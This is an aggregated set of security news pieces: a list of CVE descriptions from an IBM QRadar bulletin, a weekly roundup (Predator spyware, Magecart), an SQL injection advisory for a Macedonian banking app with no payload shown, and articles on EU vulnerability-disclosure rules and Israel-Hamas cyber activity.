**DESCRIPTION:**   Apache Portable Runtime (APR) could allow a remote attacker to execute arbitrary code on the system, caused by an integer overflow in the apr\_base64 functions. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary code or cause a denial of service condition on the system.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/246064 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2020-13956  
**DESCRIPTION:**   Apache HttpClient could allow a remote attacker to bypass security restrictions, caused by the improper handling of malformed authority component in request URIs. By passing request URIs to the library as java.net.URI object, an attacker could exploit this vulnerability to pick the wrong target host for request execution.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/189572 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-21830  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the Serialization component could allow a remote attacker to cause a denial of service resulting in a low integrity impact using unknown attack vectors.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/245038 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-21843  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the Sound component could allow a remote attacker to cause a denial of service resulting in a low integrity impact using unknown attack vectors.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/245037 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2022-3564  
**DESCRIPTION:**   A use-after-free in the function l2cap\_reassemble\_sdu of the file net/bluetooth/l2cap\_core.c of the component Bluetooth in Linux Kernel could allow a remote authenticated attacker from within the local network to cause an unknown impact.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/238741 for the current score.  
CVSS Vector: (CVSS:3.0/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2023-32067  
**DESCRIPTION:**   c-ares is vulnerable to a denial of service. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/255936 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-33201  
**DESCRIPTION:**   The Bouncy Castle Crypto Package For Java (bc-java) could allow a remote attacker to obtain sensitive information, caused by not validating the X.500 name of any certificate in the implementation of the X509LDAPCertStoreSpi.java class. By using blind LDAP injection attack techniques, an attacker could exploit this vulnerability to obtain sensitive information, and use this information to launch further attacks against the affected system.  
CVSS Base score: 7.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258653 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:N)

**CVEID:**   CVE-2023-28709  
**DESCRIPTION:**   Apache Tomcat is vulnerable to a denial of service, caused by an incomplete fix for CVE-2023-24998 related to the failure to limit the number of request parts to be processed in the file upload function. By sending a specially crafted request using query string parameters, a remote attacker could exploit this vulnerability to cause a denial of service.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/255893 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-30441  
**DESCRIPTION:**   IBM Runtime Environment, Java Technology Edition IBMJCEPlus and JSSE 8.0.7.0 through 8.0.7.11 components could expose sensitive information using a combination of flaws and configurations. IBM X-Force ID: 253188.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253188 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-40367  
**DESCRIPTION:**   IBM QRadar SIEM is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session.  
CVSS Base score: 4.6  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/263376 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N)

**CVEID:**   CVE-2016-1000027  
**DESCRIPTION:**   Pivota Spring Framework could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw in the library. By sending specially-crafted input, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 9.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/174367 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-34455  
**DESCRIPTION:**   snappy-java is vulnerable to a denial of service, caused by the use of an unchecked chunk length in the hasNextChunk function. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258190 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-34454  
**DESCRIPTION:**   snappy-java is vulnerable to a denial of service, caused by an integer overflow in the compress function. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258188 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-34453  
**DESCRIPTION:**   snappy-java is vulnerable to a denial of service, caused by an integer overflow in the shuffle function. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258186 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2022-40609  
**DESCRIPTION:**   IBM SDK, Java Technology Edition 7.1.5.18 and 8.0.8.0 could allow a remote attacker to execute arbitrary code on the system, caused by an unsafe deserialization flaw. By sending specially-crafted data, an attacker could exploit this vulnerability to execute arbitrary code on the system. IBM X-Force ID: 236069.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/236069 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2022-48339  
**DESCRIPTION:**   GNU Emacs could allow a local attacker to execute arbitrary commands on the system, caused by a flaw in the hfy-istext-command function. By sending a specially-crafted request, an attacker could exploit this vulnerability to execute arbitrary commands on the system.  
CVSS Base score: 8.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/248054 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-35116  
**DESCRIPTION:**   Fasterxml jackson-databind is vulnerable to a denial of service, caused by a stack-based overflow. By persuading a victim to open a specially crafted content, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258157 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-20867  
**DESCRIPTION:**   VMware Tools could allow a local authenticated attacker to bypass security restrictions, caused by the failure to authenticate host-to-guest operations in the vgauth module. An attacker could exploit this vulnerability using a fully compromised ESXi host to bypass authentication and obtain access to the guest virtual machine.  
CVSS Base score: 3.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/257845 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N)

**CVEID:**   CVE-2022-21426  
**DESCRIPTION:**   An unspecified vulnerability in Java SE related to the JAXP component could allow an unauthenticated attacker to cause a denial of service resulting in a low availability impact using unknown attack vectors.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/224714 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-26048  
**DESCRIPTION:**   Eclipse Jetty is vulnerable to a denial of service, caused by an out of memory flaw in the HttpServletRequest.getParameter() or HttpServletRequest.getParts() function. By sending a specially crafted multipart request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253356 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L)

**CVEID:**   CVE-2023-26049  
**DESCRIPTION:**   Eclipse Jetty could allow a remote authenticated attacker to obtain sensitive information, caused by a flaw during nonstandard cookie parsing. By sending a specially crafted request to tamper with the cookie parsing mechanism, an attacker could exploit this vulnerability to obtain values from other cookies, and use this information to launch further attacks against the affected system.  
CVSS Base score: 4.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253355 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-30994  
**DESCRIPTION:**   IBM QRadar SIEM uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/254138 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-38408  
**DESCRIPTION:**   OpenSSH could allow a remote attacker to execute arbitrary code on the system, caused by a flaw in the forwarded ssh-agent. By sending specially crafted requests, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 8.1  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/261022 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-2828  
**DESCRIPTION:**   ISC BIND is vulnerable to a denial of service, caused by a flaw that allows the named's configured cache size limit to be significantly exceeded. By querying the resolver for specific RRsets in a certain order, a remote attacker could exploit this vulnerability to exhaust all memory on the host.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258607 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-34149  
**DESCRIPTION:**   Apache Struts is vulnerable to a denial of service, caused by a flaw with only handling setProperty() but not getProperty(). By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/257947 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-25652  
**DESCRIPTION:**   Git could allow a remote attacker to bypass security restrictions. By feeding specially crafted input to \`git apply --reject, an attacker could exploit this vulnerability to overwrite a path outside the working tree.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253693 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-29007  
**DESCRIPTION:**   Git could provide weaker than expected security, caused by a configuration injection flaw. A remote attacker could exploit this vulnerability to launch further attacks on the system.  
CVSS Base score: 7.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253700 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)

**CVEID:**   CVE-2023-32697  
**DESCRIPTION:**   SQLite JDBC could allow a remote authenticated attacker to execute arbitrary code on the system, caused by a flaw when JDBC url is attacker controlled. By sending a specially crafted request, an attacker could exploit this vulnerability to execute arbitrary code on the system.  
CVSS Base score: 8.8  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/256159 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-21930  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the JSSE component could allow an unauthenticated attacker to cause high confidentiality impact and high integrity impact.  
CVSS Base score: 7.4  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253115 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N)

**CVEID:**   CVE-2023-21967  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the JSSE component could allow a remote attacker to cause high availability impact.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253156 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)

**CVEID:**   CVE-2023-21954  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the Hotspot component could allow a remote attacker to cause high confidentiality impact.  
CVSS Base score: 5.9  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253166 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-21939  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the Swing component could allow a remote attacker to cause integrity impact.  
CVSS Base score: 5.3  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253168 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-21968  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE and GraalVM Enterprise Edition related to the Libraries component could allow an unauthenticated attacker to cause low integrity impact.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253083 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-21937  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the Networking component could allow a remote attacker to cause integrity impact.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253167 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-21938  
**DESCRIPTION:**   An unspecified vulnerability in Oracle Java SE, Oracle GraalVM Enterprise Edition related to the Libraries component could allow a remote attacker to cause integrity impact.  
CVSS Base score: 3.7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/253155 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N)

**CVEID:**   CVE-2023-2597  
**DESCRIPTION:**   Eclipse Openj9 is vulnerable to a buffer overflow, caused by improper bounds checking by the getCachedUTFString() function. By using specially crafted input, a local authenticated attacker could overflow a buffer and execute arbitrary code on the system.  
CVSS Base score: 7  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/255906 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H)

**CVEID:**   CVE-2023-2976  
**DESCRIPTION:**   Google Guava could allow a local authenticated attacker to obtain sensitive information, caused by a flaw with using Java's default temporary directory for file creation in FileBackedOutputStream. By sending a specially crafted request, an attacker could exploit this vulnerability to access the files in the default Java temporary directory, and use this information to launch further attacks against the affected system.  
CVSS Base score: 5.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/258199 for the current score.  
CVSS Vector: (CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)

**CVEID:**   CVE-2023-34396  
**DESCRIPTION:**   Apache Struts is vulnerable to a denial of service, caused by a flaw when processing Multipart request containing non-file normal form fields. By sending a specially crafted request, a remote attacker could exploit this vulnerability to cause a denial of service condition.  
CVSS Base score: 7.5  
CVSS Temporal Score: See: https://exchange.xforce.ibmcloud.com/vulnerabilities/257946 for the current score.  
CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)

CVE-2023-30994: Security Bulletin: IBM QRadar SIEM includes components with known vulnerabilities

Plus: Hamas raised millions in crypto, Exxon used hacked data, and more.

The media consortium, along with security researchers from Amnesty International and Google’s Threat Analysis Group, were able to show Vietnam’s connection to the Predator hacking campaign through documents they obtained that detail the Vietnamese government’s contract with Intellexa in 2020, and later an extension of the deal to allow the use of the Predator software. The internal documents went so far as to capture the response of Intellexa’s founder, Israeli former military hacker turned entrepreneur Tal Dilian, when the deal was announced: “Wooow!!!!” Vietnam’s government would later target French officials with Predator before this year’s campaign targeting US congressmen.

Despite efforts by Israel and other nations to cut off funding to Hamas in recent years, the group raised millions of dollars worth of cryptocurrency before the past weekend’s attack that killed more than a thousand Israelis. An analysis by _The Wall Street Journal_ found that Hamas, Palestinian Islamic Jihad, and Hezbollah had collectively raised hundreds of millions in crypto over the past several years, with $41 million going to Hamas specifically. Given that the _Journal_ learned of that funding in part through Israeli seizures of crypto accounts, however, it’s not clear how much of that money was frozen or seized versus how much might have actually been successfully laundered or liquidated by Hamas and other groups. 

In response to the weekend’s attacks, the Israeli government and the world’s largest crypto exchange, Binance, both announced that a new round of Hamas crypto accounts had been frozen. Though crypto has helped Hamas and other groups move funds across borders, its traceability on blockchains has presented a challenge for designated terrorist groups. In 2021, for instance, Hamas asked its supporters to stop making donations via cryptocurrency, due to the ease of tracking those transactions and unmasking contributors.

Last year, _Reuters_ reporters Chris Bing and Raphael Satter published an investigation into Aviram Azari, an Israeli private investigator who is accused of using mercenary hackers to gather intelligence on the critics of major corporations involved in lawsuits against them. 

Now, prosecutors in the Southern District of New York, where Azari has been convicted on criminal charges, have filed a sentencing memo that notes that activists’ communications stolen by Azari’s hackers were later used by Exxon in the company’s attempts to head off investigations and lawsuits by state attorneys general. The memo still doesn’t name Exxon as Azari’s client, but it implicitly suggests a link between the company and Azari: Prosecutors point in their memo to leaks of climate activists’ private emails to media, which were later cited by Exxon in their responses to state attorney generals as evidence of underhanded tactics by activists as they tried to prove that Exxon knew and covered up the role of fossil fuels in climate change. A Massachusetts lawsuit against Exxon that resulted from the state’s investigation is ongoing.

Internet giant Akamai warned this week that the infamous Magecart hacker crew, long focused on credit card fraud, has developed a clever new technique for spoofing credit card payment fields. The hackers managed to hide their malicious scripts in the 404 “page not found” error pages of ecommerce sites, then trigger those pages to load a spoofed payment field that impersonates a checkout page to steal credit card information. “The idea of manipulating the default 404 error page of a targeted website can offer Magecart actors various creative options for improved hiding and evasion,” warned Akamai researcher Roman Lvovsky. Akamai noted that the technique was used on the website of significant brands in the food and retail industries but declined to name them.

The US Congress Was Targeted With Predator Spyware

The mobile application or the affected API suffers from an SQL Injection vulnerability. Input passed to the parameters that are associated to international transfer is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and disclose sensitive information.

Title: NLB mKlik Makedonija 3.3.12 SQL Injection  
Advisory ID: ZSL-2023-5797  
Type: Local/Remote  
Impact: Exposure of System Information, Exposure of Sensitive Information, Manipulation of Data  
Risk: (3/5)  
Release Date: 14.10.2023

**Summary**

NLB mKlik е мобилна апликација наменета за физички лица, корисници на услугите на НЛБ Банка, која овозможува преглед на различните продукти кои корисниците ги имаат во Банката како и извршување на различни видови на трансакции на едноставен и пред се безбеден начин во било кој период од денот. NLB mKlik апликацијата може да се користи со Android верзија 5.0 или понова.

**Description**

The mobile application or the affected API suffers from an SQL Injection vulnerability. Input passed to the parameters that are associated to international transfer is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code and disclose sensitive information.

**Vendor**

NLB Banka AD Skopje - https://www.nlb.mk

**Affected Version**

3.3.12

**Tested On**

Android 13

**Vendor Status**

\[23.12.2022\] Vulnerability discovered.  
\[23.12.2022\] Vendor contacted.  
\[26.12.2022\] Vendor responds asking more details.  
\[28.12.2022\] Sent details to the vendor, not encrypted. Asked for confirmation and next steps.  
\[28.12.2022\] Vendor thanks us for the cooperation.  
\[06.01.2023\] Asked vendor for update and plan for fix mob/web?  
\[09.01.2023\] Vendor informs that our request has been received and will be reviewed within the responsible department. After the department responds we will be notified.  
\[20.01.2023\] Asked vendor to provide status update and confirmation and to communicate more often.  
\[23.01.2023\] Vendor informs that our request is sent to the responsible department. After the department responds we will be notified.  
\[13.10.2023\] No response from the vendor.  
\[14.10.2023\] Public security advisory released.

**PoC**

nlbmklik\_sqli.txt

**Credits**

Vulnerability discovered by Neurogenesia - <neurogenesia@segfault.mk\>

**References**

\[1\] https://play.google.com/store/apps/details?id=hr.asseco.android.jimba.tutunskamk.production

**Changelog**

\[14.10.2023\] - Initial release

**Contact**

Zero Science Lab

Web: https://www.zeroscience.mk  
e-mail: lab@zeroscience.mk

NLB mKlik Makedonija 3.3.12 SQL Injection

The Cyber Resilience Act's requirement to disclose vulnerabilities within 24 hours could expose organizations to attacks — or government surveillance.

The European Union (EU) may soon require software publishers to disclose unpatched vulnerabilities to government agencies within 24 hours of an exploitation. But many IT security professionals want this new rule, set out in Article 11 of the EU's Cyber Resilience Act (CRA), to be reconsidered.

The rule requires vendors to disclose that they know about a vulnerability actively being exploited within one day of learning about it, regardless of patch status. Some security professionals see the potential of governments abusing the vulnerability disclosure requirements for intelligence or surveillance purposes.

In an open letter signed by 50 prominent cybersecurity professionals across industry and academia, among them representatives from Arm, Google, and Trend Micro, the signatories argue that the 24-hour window is not enough time — and would also open doors to adversaries jumping on the vulnerabilities without allowing organizations enough time to fix the issues.

"While we appreciate the CRA's aim to enhance cybersecurity in Europe and beyond, we believe that the current provisions on vulnerability disclosure are counterproductive and will create new threats that undermine the security of digital products and the individuals who use them," the letter states.

Gopi Ramamoorthy, senior director of security and GRC at Symmetry Systems, says there is no disagreement about the urgency of patching the vulnerabilities. The concerns center on publicizing the vulnerabilities before updates are available, which leaves organizations at risk of attack and unable to do anything to prevent it.

"Publishing the vulnerability information before patching has raised concerns that it may enable further exploitation of the unpatched systems or devices and put private companies, and citizens, at further risk," Ramamoorthy says.

**Prioritize Patching Over Surveillance**

Callie Guenther, senior manager of cyber threat research at Critical Start, says the intent behind the CTA is commendable, but it's vital to consider the broader implications and potential unintended consequences of governments having access to vulnerability information before updates are available.

"Governments have a legitimate interest in ensuring national security," she says. "However, using vulnerabilities for intelligence or offensive capabilities can leave citizens and infrastructure exposed to threats."

A balance must be struck wherein governments prioritize patching and protecting systems over exploiting vulnerabilities, Guenther says, proposing some alternative approaches for vulnerability disclosure, starting with tiered disclosure.

"Depending on the severity and impact of a vulnerability, varying time frames for disclosure can be set," she says. "Critical vulnerabilities may have a shorter window, while less severe issues could be given more time."

A second alternative Guenther describes concerns preliminary notification, where vendors can be given a preliminary notification with a brief grace period before the detailed vulnerability is disclosed to a wider audience.

A third way focuses on coordinated vulnerability disclosure, which encourages a system where researchers, vendors, and governments work together to assess, patch, and disclose vulnerabilities responsibly.

Any rule must include explicit clauses to prohibit the misuse of disclosed vulnerabilities for surveillance or offensive purposes, she adds.

"Additionally, only select personnel with adequate clearance and training should have access to the database, reducing the risk of leaks or misuse," Guenther says. "Even with explicit clauses and restrictions, there are numerous challenges and risks that can arise."

**When, How, and How Much to Disclose**

Responsible disclosure of vulnerabilities is a process that has, traditionally, included a thoughtful approach that enabled organizations and security researchers to understand the risks and develop patches before exposing the vulnerability to potential threat actors, notes John A. Smith, CEO at Conversant Group.

"While the CRA may not require deep details about the vulnerability, the fact that one is now known to be present is enough to get threat actors probing, testing, and working to find an active exploit," he cautions.

From Smith's perspective, the vulnerability should also not be reported to any individual government or the EU; that requirement will reduce consumer confidence and damage commerce due to nation-state spying risks.

"Disclosure is important — absolutely. But we must weigh the pros and cons of when, how, and how much detail is provided during research and discovery to mitigate risk," he says.

An alternative to this "arguably knee-jerk approach," Smith says, is to require software companies to acknowledge reported vulnerabilities within a specified but expedited time frame, and then require them to report back on progress to the discovering entity regularly, ultimately providing a public fix within a maximum of 90 days.

Guidelines on how to receive and disclose vulnerability information, as well as techniques and policy considerations for reporting, are already outlined in ISO/IEC 29147.

**Impacts Beyond EU**

The US has an opportunity to observe, learn, and subsequently develop well-informed cybersecurity policies, as well as proactively prepare for any potential ramifications if Europe moves forward too quickly, Guenther adds.

"For US companies, this development is of paramount importance," she says. "Many American corporations operate on a global scale, and regulatory shifts in the EU could influence their global operations."

The ripple effect of the EU's regulatory decisions, as evidenced by the General Data Protection Regulation's influence on the California Consumer Privacy Act and other US privacy laws, suggests that European decisions could presage similar regulatory considerations in the US, she points out.

"Any vulnerability disclosed in haste due to EU regulations doesn't confine its risks to Europe," Guenther cautions. "US systems employing the same software would also be exposed."

Security Pros Warn That EU's Vulnerability Disclosure Rule Is Risky

Mandiant's John Hultquist says to expect anti-Israel influence and espionage campaigns to ramp up as the war grinds on.

Researchers are on the lookout for state-sponsored information operations springing from the Israel-Hamas conflict, but so far, no major initiatives have cropped up. Yet that could quickly change as more hacktivists and espionage actors enter the fray.

On a press call held this week, John Hultquist, chief analyst for Mandiant Intelligence at Google Cloud, said that so far, no "coordinated cyber activity" has been identified, but attacks are expected to increase over time as the situation continues. He called out distributed denial-of-service (DDoS) activity as a possible precursor to other types of political activity, naming Anonymous Sudan in particular as being active.

And meanwhile, he noted, expect disruptive threats begin to ramp up — or at least claims of critical infrastructure hacks.

**The Beginning of Influence Operations**

Information operations have twin definitions: They can refer to the collection of tactical information about an adversary, and/or the spread of propaganda in pursuit of a competitive advantage over an opponent.

On the latter front, Hultquist said two notable information operations campaigns have been identified so far. The first is related to Iran, which he said is "promoting narratives related to the crisis." In particular, this has involved Iranian posing as Egyptians to stir up historical hostilities in influence campaigns. In previous influence instances, groups have leveraged networks of inauthentic news sites and clusters of associated accounts across multiple social media platforms to promote political narratives in line with Iranian interests, including anti-Israeli and pro-Palestinian themes.

The messages claim that Israel was humiliated by a small force, and that this exposed the weakness of one of the most advanced military superpowers, and that Israeli soldiers are now afraid of Hamas. Hultquist said these claims have not been validated, and merit "extreme skepticism."

Another information operation campaign being monitored is related to the Dragon Bridge campaign, which was identified last year as supporting the political interests of China. Hultquist said that it was seeing activity from multiple accounts associated with the Dragon Bridge campaign and that this is consistent with how the group follows news cycles and ongoing crises to portray the United States and its allies in a negative light.

In this instance, the accounts are amplifying the stance that the initial attack on Oct. 7 was a failing by the Israeli government, which didn't seem to be aware of the incoming attacks.

Hultquist said: "The silver lining is we haven't had any indication that it's getting major pickup or authentic traction, which is consistent with previous Dragon Bridge campaigns. It's one thing to broadcast these messages and create this content. It's quite another to actually penetrate the consciousness of everyday citizens."

**Beyond Influence Campaigns: Next Phase of Attacks**

Hultquist said that going forward, more espionage activity is expected, especially from actors related to Iran and Lebanon-based Hezbollah. He also said that he expects to see activity designed to look like financially motivated cybercrime, including extortion-based ransomware deployments where no money is collected, just a threat is made around data exfiltration and leaking.

"We have definitely seen Iranian actors do exactly that in Israel, and that's something that we're sort of anticipating," he said.

Meanwhile, threats and posturing against critical infrastructure will ramp up. Just this week, threat groups declared their intention to launch disruptive attacks against Israel, Palestine, and their supporters, while Anonymous Sudan claimed it attacked the Jerusalem Post. However, Hultquist did call out the amount of "dubious information" about the severity of such attacks, and noted that many claims to successfully hit major targets are just another form of influence activity.

"We're seeing threat actors take advantage of a tremendously confusing environment by lying about what they can do and what they've accomplished, or 'almost' accomplished because they recognize that these things are hard to validate by experts," he said. “By making these dubious claims that linger in the open without being validated or invalidated, they can still have the intended effect. We anticipate we'll see a lot of that in the coming days, and it could potentially have adverse psychological effects."

Tag

#google